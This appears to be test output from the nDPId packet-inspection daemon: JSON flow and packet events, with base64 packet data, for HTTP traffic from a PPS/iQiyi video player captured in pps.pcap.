00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1044,"source":"pps.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1467353155693,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353155693,"pkt":"AQBef\/\/6GF4PUugBCABFAAChLG0AAAER1wPAqAU57\/\/\/+ukAB2wAjbKhTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1045,"source":"pps.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353155790,"flow_last_seen":1467353155790,"flow_idle_time":7440000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1467353155790,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50487,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01291{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1045,"source":"pps.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1467353155790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":683,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":683,"pkt_l4_len":649,"thread_ts_msec":1467353155790,"pkt":"TF4M6gNlABxCjnAxCABFAAKdDjtAAIAG3SfAqHMIymwO28U3AFCNS81scTxdzlAYAQSLywAAR0VUIC9jb3JlP3Q9MiZjaGlwaWQ9SW50ZWwlMjhSJTI5JTIwQ29yZSUyOFRNJTI5JTIwaTUlMkQyNTU3TSUyMENQVSUyMCU0MCUyMDElMkU3MEdIeiZ0bT0xNSZyYT0xJmlzaGNkbj0yJnBmPTIwMSZwPTExJnAxPTExNCZwMj0zMDAwJnNka3RwPTEmYzE9NiZyPTUwMDQ5NDYwMCZhaWQ9NTAyOTU5OTAwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9Jm9zPXdpbmRvd3Mmdj01JTJFMiUyRTE1JTJFMjI0MCZrcnY9MiUyRTAlMkUxMDImZHQ9Jmh1PS0xJnJuPTE0NjczNTMxNTUmaXNsb2NhbD0wJmFzPWQxOWY2NDA0N2I2NDFjZDZmZjA5NmIwNGZiMmEzMGI1JnZlPTNjYzBjOGZhMzcyNjI1ZTY0MTQzMTQ0ODE2ZjNlOTY4JnBlPWM5NWQ5OTJlMjk4NTZkYzg0ZjJlOTkwN2EyZTRiMjgyJnZmcm09JmNobD0maGNkbnY9MTAuMC4wLjI5MyZ0cGNkPTAmaXNkcm09MSZodD0wIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBtc2cuNzEuYW0NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOl8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="} -01209{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1045,"source":"pps.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353155790,"flow_last_seen":1467353155790,"flow_idle_time":7440000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1467353155790,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50487,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=2&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&tm=15&ra=1&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353155&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1046,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353156641,"flow_last_seen":1467353156641,"flow_idle_time":7440000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1467353156641,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50488,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00795{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1046,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1467353156641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":311,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":311,"pkt_l4_len":277,"thread_ts_msec":1467353156641,"pkt":"TF4M6gNlABxCjnAxCABFAAEpDsFAAIAGbi7AqHMI3xpqFMU4AFDYI3WbArNbVVAYAQSIDAAAR0VUIC8yMDE2MDYyNS9hNS9iZi80MTNmOTFhZDEwMWU3ODBhNmI2M2Y4MjZlMjhiOTkyMC54bWwgSFRUUC8xLjENClVzZXItQWdlbnQ6IFFZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1ldGEudmlkZW8ucWl5aS5jb20NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOjUwMDQ5NDYwMF8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="} -00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1046,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353156641,"flow_last_seen":1467353156641,"flow_idle_time":7440000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1467353156641,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50488,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"meta.video.qiyi.com","url":"meta.video.qiyi.com\/20160625\/a5\/bf\/413f91ad101e780a6b63f826e28b9920.xml","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} -02155{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1047,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1467353156699,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353156699,"pkt":"ABxCjnAxTF4M6gNlCABFAAUU\/f1AADgGwwbfGmoUwKhzCABQxTgCs1tV2CN2nFAQAB+1jgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNTo1NiBHTVQNCkNvbnRlbnQtVHlwZTogdGV4dC94bWwNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpMYXN0LU1vZGlmaWVkOiBTYXQsIDI1IEp1biAyMDE2IDA2OjA4OjM2IEdNVA0KRXhwaXJlczogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjo1MCBHTVQNCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MzAwDQpYLUNhY2hlOiBmcm9tIDEwLjEyMS4zNC4xNDANCkNvbnRlbnQtRW5jb2Rpbmc6IGd6aXANClgtQ2FjaGU6IEhJVCBmcm9tIDEwLjEyMS4zMy45OA0KWC1DYWNoZTogRVhQSVJFRCBmcm9tIDIyMy4yNi4xMDYuMjANCg0KNWZlDQofiwgAAAAAAAADhZnrbhs5DIX\/9ykCP8BEFC+SAHf6KIuxM26NzaWtnezl6fewDtIUXdIpUNvjY4n6SJHizPbT3w\/3Ny\/r99Px6fHjhqayufk0f9gejvfraT3PH262h\/uXm8flYf24KTtalr7wbmfrfuyoDO1dZLfXhdbdbj9BusFPbrZf1uPnL+eZrWxvX9\/75b+Od+cvswmuXt76xfPxYT2dl4ev+6fH8\/Hx+en5NNP29v8uu\/yHZcd\/17kXbaXK9vbtin999\/x9OWMtM2mf2Nr29u2Kf\/1yvFuf\/jgvn+cyCv64+v8\/\/6i9vSfYWehwOKyE1ztrl8\/LXq1KWUo9HIYZXv1fv\/yMS7m8oyGt76nv1QfBl2p97WM51P1FWfhue\/vTGrdteb47vtp2GeSHha9yvCwHDMUDQ626qFw0uE5g8PO3PtKf6z+H73DZaf32vD7u15M75d3lHx9fyV\/eg8xy\/7zeHO\/g5s1cJowL+\/za7wK6JqibmaZR4xF4M3MqkM2sqUA3c0sFtpnHBEbhKhqMpAmeCxUdCk4VAwpNFQSa1HIJeNLIJSBac2MJTGtuLYFqvWIuuFabWuI7AtnacwnYcsklgMs1l4AuSyqpoMu5uRV0OTe3gq7k5lbQldzcCroikyUBVUFXLJeAriCyPXMG26+CroxJEx9V0NUyWRL+FXS1pqMw6KrkEtBVyyWgi1ycmcugayWXgK5RuiIGXeOpeHkJ0DHomkxI+rEEdM1yCehazyWga2OSxBYB3Ua5BHRbTeNFQLdJumgB3aaTJiEloNtaLvGMi6jLRgHdTrkEdDvnEtDtV8wF3Q5zkx2goNvhgGQ3KugOOCCTgO7gXAK6Q3MJ6I6WS0B3XDEXdKlcsRd4qdSpZ2sCXyoy4egTbgIFYCqWhpWBMJWea4CYCKeJZB8YGBPVXAPIRHmYGygTXbEZmImu2Oyc6xWbnXO9YrNzrldsds6otxmf5pxRcFONc0bFTTXOGSU31Thn1NxU45xRdFONc0bVzU6RzTnzSFN6c84ozek5zjmjNqca54zinGm6c0Z1bkmG685ZcJrINM4ZxTfVOGeldJ9256yca5yzaq5xztp+07y2WK+9gDdRX59OR++dLu2Cd0vve4JaK7qpoLCCS2Wy8Htn0uHJGipAhNHRUTwH"} -01353{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1048,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1467353156700,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":721,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":721,"pkt_l4_len":687,"thread_ts_msec":1467353156700,"pkt":"ABxCjnAxTF4M6gNlCABFAALD\/f5AADgGxVbfGmoUwKhzCABQxTgCs2BB2CN2nFAYAB9NTQAAeAj6KkVzGFgBGjLKoHgWsNDOg9EyBWMg4qw3sngWxFvTJslqEW1dOtsIZ\/G2YAiauUTisVZE0efGwzjXWg05LdZ4rAky0eBYc4m1ISOZy2PN0IHWZC6PtYYzQuJG8j0ND\/TECQTGtXRrmc2gXLGqInHIeH+AZh3hH4eENwhVsfKSjAPO1cTSYzk4VwRGT0LHe4TarWqyLm8S6mgVURj6q4IzFzPKNODMJE042ZbgzNQZongucObqtx3iTeOdAgtOFElsMDiz4j7IiGOewZkNmDWZyzNFp1ZHvEUZnLk3hGq8dm8XeCg2YczZ+wUeo3ON9wWDs+AA03qiAWdBguyZBpyFEaoU8\/GeQWCxJqlYwFm0ElwW+tS7BtGB8In5eNsgxoYYisfxnNwQiUliF8\/KHRWxxZwFnLGTCyWxIc55GI5LybrAWQsivsW+EHBWpMMucU7w7kGRWyyJeW8flHELMtOAswKQchyrCs6qvbWEs4Kz2mjW4n2q4IzsMyyJDQVn3LPtqKOhTxWcdXQc7RMNOFtBRUl84T0EvFVRbcO5vIcwFIPOsU8NnJExccMztsd7CARqqdlc4IxwNkRibA84m1Rl7rEGnA1No1kcPwbOptwRi\/E44GyK5JL0auaczVRLvE\/NOTdmsdhm7yG8mHJSC5pz7grS8T5tznl40Y3X3pwzVoX9E669gXMrSszJXODcCF1fS8YBZ9yrRE6I97v3EKimuN8fx2ED54ZUh6iPbQbnJlpQLEON9xDNzxJJTvAeopn2mnDu4Nya74w45js4t45NmNQ47yFa70xJ7u3OefiZN1kXOHesvIxf4\/Dy8OXXvmF7+\/b4wXuLdx\/fPY3AD+9f8Jzp8vDGHzT9Byu2GoeKGgAADQowDQoNCg=="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1049,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353156959,"flow_last_seen":1467353156959,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1467353156959,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50489,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00719{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1049,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1467353156959,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":253,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":253,"pkt_l4_len":219,"thread_ts_msec":1467353156959,"pkt":"TF4M6gNlABxCjnAxCABFAADvDvNAAIAGMe3AqHMId7wNvMU5AFAa+1ILYx41VVAYAQTDtAAAR0VUIC9rIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBwZGF0YS52aWRlby5xaXlpLmNvbQ0KQWNjZXB0OiAqLyoNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KcXlpZDphYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6XzIwMTINCnF5cGxhdGZvcm06MC0yDQoNCg=="} -00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1049,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353156959,"flow_last_seen":1467353156959,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1467353156959,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50489,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"pdata.video.qiyi.com","url":"pdata.video.qiyi.com\/k","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} -00955{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1050,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1467353156998,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":430,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":430,"pkt_l4_len":396,"thread_ts_msec":1467353156998,"pkt":"ABxCjnAxTF4M6gNlCABFAAGgqmFAADQG4c13vA28wKhzCABQxTljHjVVGvtS0lAYAB+FPAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOS40DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkNvbnRlbnQtTGVuZ3RoOiAyMDQNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCnsidCI6IjE0NjczNTMxNTYiLCJtIjoiZWMyZmQ2Njc4YTM1N2MyMDhkNTE4NmIzYzM0MjI0NmJlZTQ0YzUwY2U3MDgzOTNlIiwidSI6ImVjMmZkNjY3OGEzNTdjMjBmNTVhODJlZDYwZjYzZjk2Y2QyMDlhMWQ4OGI3ODQyNSIsImkiOiIyMjAuMTgxLjEwOS4zMyIsImsiOiJlYzJmZDY2NzhhMzU3YzIwNjI1MTY2M2U4NGQ3MDFkOTlkYjQyZTUxY2I5MWM1MzkifQ=="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1051,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157063,"flow_last_seen":1467353157063,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1467353157063,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50490,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00855{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1051,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1467353157063,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":357,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":357,"pkt_l4_len":323,"thread_ts_msec":1467353157063,"pkt":"TF4M6gNlABxCjnAxCABFAAFXDwhAAIAGMXDAqHMId7wNvMU6AFAWZyP1RIzmWFAYAQR4owAAR0VUIC8yZWZjOGNkNWZiZTBmNGVlNDk4ZmIxYzJmYzFkZThiNi92aWRlb3MvdjAvMjAxNjA2MjUvYTUvYmYvOGRlOWJiOTQ2OTcyYTg4NTg5ZDE2Njc4NjIyOTIxMzAuZjR2PyZ0bj0xMzc3MTkgSFRUUC8xLjENClVzZXItQWdlbnQ6IFFZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IHBkYXRhLnZpZGVvLnFpeWkuY29tDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpxeWlkOmFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDpfMjAxMg0KcXlwbGF0Zm9ybTowLTINCg0K"} -00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1051,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157063,"flow_last_seen":1467353157063,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1467353157063,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50490,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"pdata.video.qiyi.com","url":"pdata.video.qiyi.com\/2efc8cd5fbe0f4ee498fb1c2fc1de8b6\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?&tn=137719","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} -01021{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1052,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1467353157103,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":479,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":479,"pkt_l4_len":445,"thread_ts_msec":1467353157103,"pkt":"ABxCjnAxTF4M6gNlCABFAAHRefhAADQGEgZ3vA28wKhzCABQxTpEjOZYFmclJFAYAB\/Y6wAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOS40DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDb250ZW50LUxlbmd0aDogMjUyDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KDQp7InQiOiJPVkVSU0VBfFRXX0hpTmV0LTExOC4xNjMuOC45MCIsInoiOiJ0YWliZWlfb3RoZXIiLCJoIjoiLTcyIiwibCI6Imh0dHA6Ly8yMjMuMjYuMTA2LjY2L3ZpZGVvcy92MC8yMDE2MDYyNS9hNS9iZi84ZGU5YmI5NDY5NzJhODg1ODlkMTY2Nzg2MjI5MjEzMC5mNHY\/a2V5PTA3ZWVmMTgyMWUyMzc5ZDMxMzZmZmUxNjA4MjE4NWJhMiZzcmM9aXFpeWkuY29tJiZ0bj0xMzc3MTkmdXVpZD03NmEzMDg1YS01Nzc2MDg0NC1kZSIsImUiOiIwIn0="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1053,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157138,"flow_last_seen":1467353157138,"flow_idle_time":7440000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":372,"flow_tot_l4_payload_len":372,"flow_avg_l4_payload_len":372,"midstream":1,"thread_ts_msec":1467353157138,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50491,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00947{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1053,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1467353157138,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":426,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":426,"pkt_l4_len":392,"thread_ts_msec":1467353157138,"pkt":"TF4M6gNlABxCjnAxCABFAAGcDxlAAIAGbTXAqHMI3xpqQsU7AFAuAjEcSma44VAYAQTWMgAAR0VUIC92aWRlb3MvdjAvMjAxNjA2MjUvYTUvYmYvOGRlOWJiOTQ2OTcyYTg4NTg5ZDE2Njc4NjIyOTIxMzAuZjR2P2tleT0wN2VlZjE4MjFlMjM3OWQzMTM2ZmZlMTYwODIxODViYTImc3JjPWlxaXlpLmNvbSYmdG49MTM3NzE5JnV1aWQ9NzZhMzA4NWEtNTc3NjA4NDQtZGUgSFRUUC8xLjENClJhbmdlOiBieXRlcz0wLTQwOTU5DQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiAyMjMuMjYuMTA2LjY2DQpBY2NlcHQ6ICovKg0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpxeWlkOmFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDo1MDA0OTQ2MDBfMjAxMg0KcXlwbGF0Zm9ybTowLTINCg0K"} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1053,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157138,"flow_last_seen":1467353157138,"flow_idle_time":7440000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":372,"flow_tot_l4_payload_len":372,"flow_avg_l4_payload_len":372,"midstream":1,"thread_ts_msec":1467353157138,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50491,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"223.26.106.66","url":"223.26.106.66\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?key=07eef1821e2379d3136ffe16082185ba2&src=iqiyi.com&&tn=137719&uuid=76a3085a-57760844-de","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} -02177{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1054,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1467353157142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353157142,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUui5AADgGBqjfGmpCwKhzCABQxTtKZsK5LgIykFAQAB\/uTwAAXABAYzwo9cKPXABAY3wo9cKPXABAY7wo9cKPXAAACQAACKIJAAAyAAAAAAAAABcAAAAAAWQAH\/\/hAB1nZAAfrFYkCgL\/lmoCAgKAAAADAIAAABlHjBjFQAEABWjomvLAAAAAPQgAAAkAAAAAAAAArwATkFblpUgAAAAAFAkAbwgAAAAAAAAAFwEAAFAAAG7\/ZYiCABX\/95xkfm3FH8zfxiVyZItj2+QvcPG\/css\/ZW+K7oKmOXqvyof6+MpsbuBrR3NlYBBVWVRq3WcvPz43KJn6OOq7wUatnW33K69XETXFsUoSgXdN7o0kq4w+hJrrFVm3jhsmgXWVk6qs6hebWuZRXfCylsvlyYQvoo8ujkxwf\/jOPhyl6i\/pTDKbDQZOrGmk9iGos+6hcPjtrVmq5rC28bSpDQb\/l3J+48zXTAIJQ0eBYWXFdgZPT7ei\/1f\/9\/tmNrD8GxGJp2OeeHzKlWg0+2iCixox6opp5+CbF3ew+UCOGdg3U\/5oVyFXyPX7+O0Is6zwfWwGCWJoC6\/zQa49qCQPS9W27Dn4e7vsWHcsLdg3UHzR4Z1JuDFBW7ue0EA3sC0gP\/mqqJuTdXptxBOJRjQ63vSnOV7PtDcJs4A7oWz2JzmEh+VbAw2U5760xCgZf0h+IR4GdMhaD57XDY8NdoZSDUzKAjvVKzHkc\/gdXpR0l6TIGuQcP2n5BFznR2iYeCE\/miwzmIeVW7avmSkaYobdmdMxT40yLpSDo7E8P+71xqJEqUUh6vFl9rz126Cgazh0LClcgaFaNKcZScAJKPrVP1o7kkOIcKwxW2CdOD77SH4zyVYWD9ULtNPIZ77Kl\/LYJQ8L2R419x+V6vNClYH7FDNYQst\/D12fjQ\/m+4yqq8ANYgNFZAXKlC8uKiIfcH\/TAErY7s8c2cJx1lhY3xTKhpLrPcsLU9UsA+Oip34KoUwvW3F5sUP0n2c\/KNlUH5ayGqegy5bryGeYm\/zuaor3RjqVC+afHCqaNQNUM+bdihsi6\/dYDdiuHkznFARXAj+HmRzPclqFdQs0umlOh+4nrXrTgUTsq6Mijt5YgP1vOKM5AtjEldVCDmGr1tU5uzTP\/wOgMtD4fsuENAnY849iMY16mjQC8PBzOazume30AYsAvNe5umLe2Jg9g1q77PVd7s5Hu\/6sIJWIf7my9bXHqgu1vXqQE6ohulSfKXSbeWRxV1zDne\/VQKrMqsiN5thBJ6eGrmP690VCEON3vIc3K8eMxOBEG1sH2gt0\/QY+qtme7NqWlgnah6YGN282gbUWFJTA8lul4VGFodu6rBHcO4b\/OZ2Vgodz1eVa7Rvhlz0zeO\/YLtQjl7fwTfVY1piKLJlsXBuH5KXSLNolBVVHCVrAQmkekZvhiLsm\/G4SGTer+1uPrS5m3ZHSe234ovyt+yHtfZCEP\/\/gOVJ5LO7C7uAyroC7rFx6lIcBOyO9mnt4Fi0rv6nmI9Iuf1\/XjKYeJJ3hPNphBZXvUwpvdJUyrMP\/WSQf4xrhUZbkn+wcvgAg5Hq\/N\/ilxIaAfekOtHVgU5VwnYm0lrbpwZtnYoLYol2itsi\/Tiny8B2OHcGdfUzCAOCON\/0+\/ipakxXBeRa7CLgs5mjI+rNnEby8whMLuruKRetpD4LDPViHWG\/OwHoZ14S6hpwBDqQ07xh3U7DjW9xs4GqS"} 